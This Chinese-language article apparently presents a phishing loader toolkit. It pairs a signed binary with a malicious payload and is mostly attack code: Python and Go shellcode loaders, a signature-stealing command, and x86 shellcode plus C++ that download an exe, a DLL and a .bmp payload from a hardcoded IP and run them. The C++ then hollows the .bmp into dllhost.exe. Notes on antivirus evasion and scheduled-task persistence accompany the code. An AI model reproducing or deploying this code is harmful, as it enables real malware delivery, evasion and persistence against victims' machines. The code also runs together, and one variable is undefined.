实战 | Sfish 基于白加黑钓鱼加载器利用工具
参考文章:https://www.cnblogs.com/zpchcbd/p/15947246.html 如何编写shellcode


0X01    启动


python shellcode loader

import ctypesimport sys
shellcode = bytes.fromhex(sys.argv[1].strip())
shellcode = bytearray(shellcode)# 设置VirtualAlloc返回类型为ctypes.c_uint64ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64# 申请内存ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# 放入shellcodebuf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))# 创建一个线程从shellcode防止位置首地址开始执行handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))# 等待上面创建的线程运行完ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

golang shellcode loader

func loader2(sc []byte)   {//  获取当前进程的句柄  pHandle, _ := syscall.GetCurrentProcess()  Protect := windows.PAGE_EXECUTE_READWRITE// 为shellcode分配足够大小的内存  addr, _, _ := VirtualAllocEx.Call(uintptr(pHandle), 0, uintptr(len(sc)), windows.MEM_RESERVE|windows.MEM_COMMIT, windows.PAGE_READWRITE)// 将shellcode写入内存当中  WriteProcessMemory.Call(uintptr(pHandle), addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))//修改进程的保护属性为可读写可执行  VirtualProtectEx.Call(uintptr(pHandle), addr, uintptr(len(sc)), windows.PAGE_EXECUTE_READWRITE, uintptr(unsafe.Pointer(&Protect)))//创建线程执行shellcode  x,_, _ := CreateRemoteThread.Call(uintptr(pHandle), 0, 0, addr, 0, 0, 0)    for{




  • 为了让目标上线,自己会先把恶意文件下载到目标机器上进行执行,而下载这种行为相对杀毒来说是比较敏感的,所以我尽量采取杀毒监控不严格的API,所以我这里通过系统dll中的下载API来进行

  • 为了更好的在目标上线之后进行恶意操作,所以我把在本地上线的时候是CreateProcess通过白加黑的方式进行的上线



python sigthief.py -i dbgview.exe -t loader.exe -o loader_a.exe


  • 为了让权限在PC机器上更好的维持,同样权限维持的操作也是在白加黑的方式下进行,我这里采取的是通过COM接口编写的计划任务进行权限维持

  • 权限维持的时候,还需要考虑当前的权限是做好高权限的权限维持还是低权限的权限维持



.386.model flat,stdcall.stack 4096
.codeassume fs:nothingmain proc xor ecx, ecx mov eax, fs:[ecx + 30h] nop mov eax, [eax + 0ch] nop mov esi, [eax + 14h] nop lodsd nop xchg eax, esi nop lodsd nop mov ebx, [eax + 10h] nop mov edx, [ebx + 3ch] add edx, ebx nop mov edx, [edx + 78h] nop add edx, ebx nop mov esi, [edx + 20h] nop add esi, ebx nop xor ecx, ecx
get_function: inc ecx ; Increment the ordinal lodsd ; Get name offset add eax, ebx ; Get function name cmp dword ptr[eax], 50746547h ; GetP jnz get_function ; cmp dword ptr[eax + 4h], 41636f72h ; rocA jnz get_function ; cmp dword ptr[eax + 8h], 65726464h ; ddre jnz get_function ; mov esi, [edx + 24h] ; ESI = Offset ordinals add esi, ebx ; ESI = Ordinals table mov cx, [esi + ecx * 2] ; Number of function dec ecx ; mov esi, [edx + 1ch] ; Offset address table add esi, ebx ; ESI = Address table mov edx, [esi + ecx * 4] ; EDX = Pointer(offset) add edx, ebx ; EDX = GetProcAddress
xor ecx, ecx ; ECX = 0 push ebx ; Kernel32 base address push edx ; GetProcAddress push ecx ; 0 push 41797261h ; aryA nop push 7262694ch ; Libr nop push 64616f4ch ; Load push esp ; "LoadLibrary" push ebx ; Kernel32 base address call edx ; GetProcAddress(LL)
add esp, 0ch ; pop "LoadLibrary" pop ecx ; ECX = 0
; 获取inseng.dll模块 push eax ; EAX = LoadLibrary push ecx push 6c6ch ; ll nop push 642e676eh ; ng.d nop push 65736e69h ; inse push esp ; "inseng.dll" call eax ; LoadLibrary("inseng.dll")
add esp, 0ch ; Clean stack pop ecx ;
mov edx, [esp + 4h] ; EDX = GetProcAddress push edx
; GetProcAddress(DownloadFile) 导出函数 xor ecx, ecx ; ECX = 0 push ecx push 656C6946h ; eilF nop push 64616F6Ch ; daol nop push 6E776F44h ; nwoD nop push esp; "DownloadFile" push eax; kernel32.dll address call edx; GetProcAddress(DownloadFile)
add esp, 0ch; Cleanup stack pop ecx; push eax; save DownloadFile function
; DownloadFile("http://xxxx/test.exe", "C:\\ProgramData\\test.exe", 1);
xor ecx,ecx xor ebx,ebx ; http://xxxx/test.exe push 65h ; e nop push 78652E66h ; xe.f nop push 64507573h ; dPus nop push 694A2F33h ; iJ/3 nop push 36312E37h ; 61.7 nop push 30312E33h ; 01.3 nop push 34312E33h ; 41.3 nop push 342F2F3Ah ; 4//: nop push 70747468h ; ptth
; C:\ProgramData\test.exe push 6578h nop push 652e6664h nop push 50757369h nop push 4A5C6174h nop push 61646D61h nop push 72676F72h nop push 705c3a43h push 1 lea ecx, [esp + 4h] push ecx lea ecx, [esp + 24h] push ecx call eax
add esp, 38h ; Cleanup stack mov eax, [esp+4h] ;
; DownloadFile("http://xxx/sqlite3.dll", "C:\\ProgramData\\sqlite3.dll", 1); xor ecx,ecx xor ebx,ebx
; http://xxx/sqlite3.dll push 6Ch ; l nop push 6C642E33h ; ld.3 nop push 6574696Ch ; etil nop push 71732F33h ; qs/3 nop push 36312E37h ; 61.7 nop push 30312E33h ; 01.3 nop push 34312E33h ; 41.3 nop push 342F2F3Ah ; 4//: nop push 70747468h ; ptth
; C:\ProgramData\sqlite3.dll push 6C6Ch ; ll nop push 642E3365h ; d.3e nop push 74696C71h ; tilq nop push 735C6174h ; s/at nop push 61646D61h ; adma nop push 72676F72h ; rgor nop push 705c3a43h ; P/:c push 1 lea ecx, [esp + 4h] push ecx lea ecx, [esp + 24h] push ecx mov eax, [esp + 4ch] call eax
add esp, 38h; Cleanup stack mov eax, [esp+4h]; xor ecx, ecx
; DownloadFile("http://xxx/g.bmp", "C:\\ProgramData\\g.bmp", 1); xor ecx,ecx xor ebx,ebx
; http://xxx/g.bmp push 706d62h ; pmb nop push 2e672F33h ; .g/3 nop push 36312E37h ; 61.7 nop push 30312E33h ; 01.3 nop push 34312E33h ; 41.3 nop push 342F2F3Ah ; 4//: nop push 70747468h ; ptth
; C:\ProgramData\gg.bmp push 70h nop push 6d622e67h nop push 675C6174h nop push 61646D61h nop push 72676F72h nop push 705c3a43h push 1 lea ecx, [esp + 4h] push ecx lea ecx, [esp + 20h] push ecx mov eax, [esp + 40h] call eax
add esp, 34h; Cleanup stack xor ecx, ecx
;get WinExec to exec pdf.exe from kernel32.dll
mov eax, [esp] ; EAX = LoadLibrary push ecx push 6c6c642eh ; .dll nop push 32336c65h ; el32 nop push 6e72656bh ; kern push esp ; "kernel32.dll" call eax ; LoadLibrary("kernel32.dll")
add esp, 0ch ; Clean stack pop ecx ;
mov edx, [esp + 4h] ; EDX = GetProcAddress push edx ; xor ecx, ecx ; ECX = 0 push ecx ;
mov ecx, 61636578h push ecx ; xeca sub dword ptr[esp + 3h], 61h ; Remove "a" nop push 456e6957h ; push esp ; "WinExec" push eax ; kernel32.dll address call edx ; GetProcAddress(WinExec)
add esp, 8h ; Cleanup stack pop ecx;
xor ecx, ecx ; ECX = 0 xor ebx, ebx push ecx push 6578h nop push 652e6664h nop push 50757369h nop push 4A5C6174h nop push 61646D61h nop push 72676F72h nop push 705c3a43h mov ebx, esp push 0ah push ebx
call eax ; calc add esp, 1ch ; Clean stack pop ecx;
xor ecx,ecx xor ebx,ebx mov eax, dword ptr[esp+0ch] mov edx, dword ptr[esp] mov ecx, 61737365h ; essa push ecx sub dword ptr[esp + 3h], 61h ; Remove "a" push 636f7250h ; Proc nop push 74697845h ; Exit push esp ; ExitProcess push eax ; kernel32.dll base address call edx ; GetProc(ExitProcess) xor ecx, ecx ; ECX = 0 push ecx ; Return code = 0 call eax ; ExitProcess
main endpend main


#include<iostream>#include<windows.h>  #include "base64.h"
using namespace std;
typedef UINT(CALLBACK *t_DownloadFile)(LPCSTR, LPCSTR, int);
int WinMain(
HINSTANCE hInstance,//应用程序的实例句柄
HINSTANCE hPrevInstance,//上一个应用程序的句柄。在win32环境下,参数一般为null,不起作用
LPSTR IpCmdline,//char*argv[]命令行的参数
int nShowCmd//显示命令最大化最小化 ){ // C:\\Windows\\System32\\inseng.dll -> QzpcXFdpbmRvd3NcXFN5c3RlbTMyXFxpbnNlbmcuZGxs HMODULE dll = LoadLibrary(base64_decode(string("QzpcXFdpbmRvd3NcXFN5c3RlbTMyXFxpbnNlbmcuZGxs")).c_str());
// RG93bmxvYWRGaWxl -> DownloadFile t_DownloadFile DownloadFile = (t_DownloadFile)GetProcAddress(dll, base64_decode(string("RG93bmxvYWRGaWxl")).c_str());
// 1 DownloadFile(base64_decode(string("aHR0cDovLzQzLjE0My4xMDcuMTYzL0ppc3VQZGYuZXhl")).c_str(), base64_decode(string("QzpcXFByb2dyYW1EYXRhXFxKaXN1UGRmLmV4ZQ==")).c_str(), 1);
// 2 DownloadFile(base64_decode(string("aHR0cDovLzQzLjE0My4xMDcuMTYzL3NxbGl0ZTMuZGxs")).c_str(), base64_decode(string("QzpcXFByb2dyYW1EYXRhXFxzcWxpdGUzLmRsbA==")).c_str(), 1);
// 3 DownloadFile(base64_decode(string("aHR0cDovLzQzLjE0My4xMDcuMTYzL2cuYm1w")).c_str(), base64_decode(string("QzpcXFByb2dyYW1EYXRhXFxnZy5ibXA=")).c_str(), 1);
// 4 CloseHandle(dll);
PROCESS_INFORMATION ProcessInformation; STARTUPINFOA StartupInfo; memset(&StartupInfo, 0, sizeof(StartupInfo)); StartupInfo.cb = 68;
// C:\\ProgramData\\test.exe -> QzpcXFByb2dyYW1EYXRhXFxKaXN1UGRmLmV4ZQ== CreateProcess(0, (LPSTR)base64_decode(string("QzpcXFByb2dyYW1EYXRhXFxKaXN1UGRmLmV4ZQ==")).c_str(), 0, 0, 0, CREATE_NEW_CONSOLE, 0, 0, &StartupInfo, &ProcessInformation);
//WinExec("C:\\ProgramData\\test.exe", CREATE_NO_WINDOW); TerminateProcess(GetCurrentProcess(), 0); return 0;}
    FILE* fp;                  // 定义流式文件操作变量fp,FILE结构体在stdio.h里面有定义    size_t size;                // 定义文件字节数变量size    unsigned char* buffer;            // 定义缓存指针变量    fp = fopen("C:\\ProgramData\\gg.bmp", "rb");                          // fseek()负号前移,正号后移    fseek(fp, 0, SEEK_END);            // 文件指针指向文件末尾                          // ftell()返回给定流 stream 的当前文件位置    size = ftell(fp);              // size值为文件大小    fseek(fp, 0, SEEK_SET);            // 文件指针指向文件开头    buffer = (unsigned char*)malloc(size);    // 动态申请图片大小的内存空间(数组指针)    fread(buffer, size, 1, fp);          // 从fp读取和显示1个size大小的数据    CloseHandle(fp);
char* v7A = (char*)VirtualAlloc(0, size, 0x3000u, 0x40u); memcpy((void*)v7A, buffer, size);
struct _PROCESS_INFORMATION ProcessInformation; struct _STARTUPINFOA StartupInfo; void* lp_addr; CONTEXT Context; DWORD DwWrite = 0; memset(&StartupInfo, 0, sizeof(StartupInfo)); StartupInfo.cb = 68; BOOL result = CreateProcessA(0, (LPSTR)"dllhost.exe", 0, 0, 0, 0x44u, 0, 0, &StartupInfo, &ProcessInformation); if (result) { Context.ContextFlags = 65539; GetThreadContext(ProcessInformation.hThread, &Context); lp_addr = VirtualAllocEx(ProcessInformation.hProcess, 0, size, MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(ProcessInformation.hProcess, lp_addr, v7A, size, &DwWrite); Context.Eip = (DWORD)v24; SetThreadContext(ProcessInformation.hThread, &Context); ResumeThread(ProcessInformation.hThread); CloseHandle(ProcessInformation.hThread); result = CloseHandle(ProcessInformation.hProcess); } TerminateProcess(GetCurrentProcess(), 0);













